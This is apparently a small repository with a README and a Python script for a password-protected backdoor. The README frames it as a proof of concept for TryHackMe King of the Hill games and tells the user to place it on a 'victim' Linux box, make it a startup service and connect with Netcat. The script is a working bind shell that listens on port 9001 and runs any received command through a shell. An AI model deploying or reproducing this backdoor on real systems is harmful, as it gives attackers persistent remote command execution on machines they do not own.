├── README.md
└── backdoor.py


/README.md:
--------------------------------------------------------------------------------
 1 | ## Password Protected Backdoor
 2 | 
 3 | It's a simple password protected backdoor using subprocess to execute commands.
 4 | Instructions:
 5 | - Place on victim Linux box
 6 | - Create a service to ensure it's running at startup
 7 | - Use Netcat to connect to the Backdoor
 8 | 
 9 | So why use this over other methods?
10 | Well, to be honest, you shouldn't lol. 
11 | This is a more or less proof of concept for a King Of The Hill box for the Cyber Security training platform TryHackMe (https://tryhackme.com).
12 | 
13 | Note: Traffic is NOT encrypted and is in CLEARTEXT. This is NOT SECURE and should not be treated as such.
14 | 
15 | Created by Ronald Bartwitz
16 | 
17 | To do:
18 | - [ ] Add support for Encryption
19 | 


--------------------------------------------------------------------------------
/backdoor.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | 
 3 | import socket
 4 | import subprocess
 5 | import threading
 6 | 
 7 | LOCALHOST = '0.0.0.0'
 8 | PORT = 9001
 9 | banner = (b"""
10 | ================================================
11 |         Password Protected Backdoor        
12 | ================================================
13 | 
14 | """)
15 | class ClientThread(threading.Thread):
16 |     def __init__(self,clientAddress,clientsocket):
17 |         threading.Thread.__init__(self)
18 |         self.csocket = clientsocket
19 |         print ("New connection added: ", clientAddress)
20 |     def run(self):
21 |         print('Connected by', clientAddress)
22 |         while True:
23 |             self.csocket.send(banner)
24 |             while True:
25 |                 data = self.csocket.recv(1024)
26 |                 if data.decode() == "INSERT PASSWORD HERE\n":
27 |                     self.csocket.send(b"Correct Password!\n")
28 |                     while True:
29 |                         data = self.csocket.recv(1024)
30 |                         self.csocket.send(b"Command: " + data)
31 |                         command = data.decode()
32 |                         proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
33 |                         output = proc.stdout.read()
34 |                         self.csocket.send(bytes(output))
35 |                 else:
36 |                     self.csocket.send(b"Password Incorrect\n")
37 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
38 | s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
39 | s.bind((LOCALHOST, PORT))
40 | print("Server started")
41 | print("Waiting for clients to connect...")
42 | 
43 | while True:
44 |     s.listen(1000)
45 |     clientsock, clientAddress = s.accept()
46 |     newthread = ClientThread(clientAddress, clientsock)
47 |     newthread.start()
48 | 


--------------------------------------------------------------------------------